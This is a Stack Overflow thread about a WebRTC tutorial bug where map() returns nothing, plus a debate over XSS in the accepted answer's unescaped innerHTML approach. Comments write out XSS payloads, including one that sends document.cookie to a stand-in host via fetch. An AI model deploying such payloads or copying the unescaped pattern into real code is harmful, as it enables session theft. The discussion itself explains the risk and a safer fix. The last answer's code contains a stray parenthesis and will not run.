# Why can we omit a return statement in this usage of the method map()

Tags: javascript, arrays, webrtc

I am currently going over the WebRTC tutorial on their [docs](https://webrtc.org/getting-started/media-devices) when I noticed that they use forEach after their usage of map(). In order to use forEach and expect a value instead of undefined array, map() would have needed to return an array, which I don't see how it can, because it doesn't return anything.

```
function updateCameraList(cameras) {
    const listElement = document.querySelector('select#availableCameras');
    listElement.innerHTML = '';
    cameras.map(camera => {
        const cameraOption = document.createElement('option');
        cameraOption.label = camera.label;
        cameraOption.value = camera.deviceId;
    }).forEach(cameraOption => listElement.add(cameraOption));
}
```

Comment: because nothing is returned so it is undefined so they have a bug.

Comment: This code is definitely incorrect. In the `forEach`, each `cameraOption` is just `undefined`.

Comment: should have `return cameraOption` The map is sort of useless here since it is adding a second loop. Just the forEach would be fine.

Comment: file an issue at https://github.com/webrtc/FirebaseRTC/issues
-- even though this codelab is effectively unmaintained.

Comment: @PhilippHancke https://twitter.com/mplungjan/status/1456335770210521098

Answer (score 4, accepted):

The code will not work since the map returns nothing.

Here is an alternative method

```
function updateCameraList(cameras) {
  document.getElementById('availableCameras').innerHTML = cameras
  .map(({label, deviceId}) => `<option value="${deviceId}">${label}</option>`)
  .join(""); 
}
```

I learned today that we now can use label instead of text

https://jsfiddle.net/mplungjan/osyLzqk2/

Here is a safer version since there is a tiny possibility for XSS

```
function updateCameraList(cameras) {
  const sel = document.getElementById('availableCameras')
  cameras.forEach(({label, deviceId}) => {
    const option = new Option(label,deviceId); 
    sel.add(option)
  })
}
```

And here is a non working attempt of XSS - at least it does nothing in Chrome

```js
const cameras = [{ deviceId : `xss"></option></select><img src="x" onerror="alert(1)" />`  , label:"bla" }]

    function updateCameraList(cameras) { 
      const xssString = cameras
      .map(({label, deviceId}) => `<option value="${deviceId}">${label}</option>`)
      .join("")
      console.log(xssString)
      document.getElementById('availableCameras').innerHTML = xssString; 
    }


updateCameraList(cameras)
```

```html
<select id="availableCameras"></select>
```

Comment: This is actually a worse method because it now allows USB devices to execute code in your website by reporting malicious device information. What if the camera reports its name as `<img onerror="fetch('https://example.com/?'+document.cookie)">`? (XSS via USB, that's a new one)

Comment: Only if there is no proper data handling when storing the data

Comment: No not really. See my edited example. As soon as the code in your answer runs while a malicious USB camera is plugged in, it would send the user's cookies to an attacker's server. (Unlikely scenario, of course, but it can be a stepping stone in some other attack - see Dr. Reason's Swiss Cheese Model. I'd love something like that in a CTF ^^)

Comment: Come on. This should not happen if proper care is taken at the storing end of the process. Where do you get the usb issue from???

Comment: My point is that you are advocating the use of unescaped string substitution while building HTML. This should simply **never** be done, just like you should never put unescaped data into an SQL statement just because you think "it's a number anyway, what can happen".

Comment: Generally, I use a function to escape HTML (one option would be `const escape = s => { const el = document.createElement('i'); el.innerText = s; return el.innerHTML.replace(/"/g, '&quot;') }`) so then I can do `\`<option value="${escape(deviceId)}">${escape(label)}</option>\``. Of course with such a short snippet, the use of a template and therefore the need for the function is overkill, and it would imo be better to do what the code originally did - assign the attributes directly instead of embedding anything in HTML.

Comment: It's true that my exact example won't work because I overlooked that this is inside of a `<select>`, but it would work with a different payload that breaks out of the select tag (e.g. `</option></select><img src=x onerror=alert(1)>`). I wasn't able to get it tested with a camera quickly, but I artificially crafted an audio device with an XSS payload in the name and Chrome didn't remove any special characters from it, resulting in the tag (in this test changed to `<div>` for simplicity) actually being added to the DOM: https://i.stack.imgur.com/EZOGe.png - https://i.stack.imgur.com/WGSUo.png

Comment: that's partially because you assign the return value of `console.log`, which is `undefined`... and not the actual HTML. But you are right that the XSS cannot escape the select, my mistake.

Comment: Look again. It does not happen

Comment: But you are right it still doesn't happen, which is because I forgot you are setting the innerHTML of the select itself and not something outside, so we cannot escape the select. And in this specific case you are _likely_ correct (I couldn't find any events or CSS properties that are exploitable) that there is no XSS possible but only because this is a `<select>`. If it were a `<div>` it would be a different story. Therefore I still think it's a fragile approach that relies on a non-obvious fact as only protection, and I would by priciple never insert non-HTML into HTML without escaping it.

Comment: @CherryDT Hmm. You are correct with the div. That is something to remember. As I said, I only access APIs I know and where there cannot be any xss. But if you access data from usb or camera, then yeah... A long shot but could happen

Comment: Correction: Super edge case, but even the `<select>` case is exploitable (with some help from the user) but in Firefox only, because Firefox supports `onclick` on `<option>` elements. Try `{ label: '</option><option onclick="alert(1)">CLICK ME' }`

Comment: I am just an advocate for security principles in every step on the way, because this eventually just leads to much more secure and robust software. Many exploits happen because someone can go unexpected routes in the code, enter things in a way we thought "should never happen" and therefore didn't bother protecting, etc. - combining multiple bugs that were innocent on their own is the way to do the really big hacks :) - Plus, this means that beginners who can't 100% understand what is "probably safe" and what isn't will write secure code anyway, if they _always_ apply these principles.

Comment: @CherryDT added a safer version too

Answer (score 2):

The code is clearly missing a line. The code should be pushing undefined into an array and that would be appended to the select.

```
function updateCameraList(cameras) {
    const listElement = document.querySelector('select#availableCameras');
    listElement.innerHTML = '';
    cameras.map(camera => {
        const cameraOption = document.createElement('option');
        cameraOption.label = camera.label;
        cameraOption.value = camera.deviceId;
        return cameraOption;
    }).forEach(cameraOption => listElement.add(cameraOption));
}
```

Now why would we need to loop twice, it is a bit of a waste of time. So I would just loop once.

```
function updateCameraList(cameras) {
    const listElement = document.querySelector('select#availableCameras');
    listElement.innerHTML = '';
    cameras.forEach(camera => {
      const cameraOption = document.createElement('option');
      cameraOption.label = camera.label;
      cameraOption.value = camera.deviceId;
      listElement.add(cameraOption));
    });
}
```